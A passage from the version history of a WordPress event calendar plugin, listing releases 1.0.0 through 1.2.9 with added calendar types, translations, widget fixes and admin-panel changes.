*   Added languages for Timeline type.
*   Changed function for constructing Timeline calendar.

**Version 1.2.9**

*   Changed CSS style for Flexible Calendar type.
*   Updated uploading function for videos and images.
*   Changed Basic function for creating Timeline Calendar.

**Version 1.2.8**

*   Fixed bug In Flexible Calendar type (Did not show the year in the calendar).
*   Changed all functions for creating calendar.
*   Updated the function for creating the events by ordering.

**Version 1.2.7**

*   Fixed PHP error in widget.

**Version 1.2.6**

*   Fixed a bug in the widget.

**Version 1.2.5**

*   Added new Type of calendar: ” Timeline Calendar “
*   Opened some functions for free version.

**Version 1.2.4**

*   Added possibility to create more than one flexible Calendar on the same page.

**Version 1.2.3**

*   Added Secondary question for deleting calendar or events.

**Version 1.2.2**

*   Added new text editor for making event description.

**Version 1.2.1**

*   In Category ” Total Products ” added new plugin ” Event Calendars ” by Total-Soft.

**Version 1.2.0**

*   Modified the Design Admin Panel.

**Version 1.1.9**

*   Added possibility to create more than one Simple Calendar on the same page.

**Version 1.1.8**

*   Tested with WP version 4.7.3.

**Version 1.1.7**

*   Added a function into the first and second versions. You can add descriptions, pictures, videos and choose time format.

**Version 1.1.6**

*   Added a new color picker type.
*   Opened some functions for free version.

**Version 1.1.5**

*   Added translations in several languages for the month names and weekday names.
*   Fixed bug in Flexible Calendar type with translation.

**Version 1.1.4**

*   Added new menu in the plugin.

**Version 1.1.3**

*   Fixed bugs in the 3 calendar types.

**Version 1.1.2**

*   Added new Calendar Type “Flexible Calendar” in which you can add events with images and videos from YouTube and Vimeo.

**Version 1.1.1**

*   Added Italian translation.

**Version 1.1.0**

*   Fixed a bug with icons.

**Version 1.0.8**

*   Issue with date format solved

**Version 1.0.7**

*   Fixed a problem with the widget

**Version 1.0.6**

*   Added new Type of calendar: ” Simple Calendar “

**Version 1.0.5**

*   Changed in the Admin panel
*   Added educational text for the users how to adjust the calendar

**Version 1.0.4**

*   Fixed Syntax Error

**Version 1.0.3**

*   Changed free version some parameters

**Version 1.0.2**

*   Fixed a bug in the event

**Version 1.0.1**

*   Fixed a little bug that was affecting some users

**Version 1.0.0**

*   Initial Version Release

Tag

#mac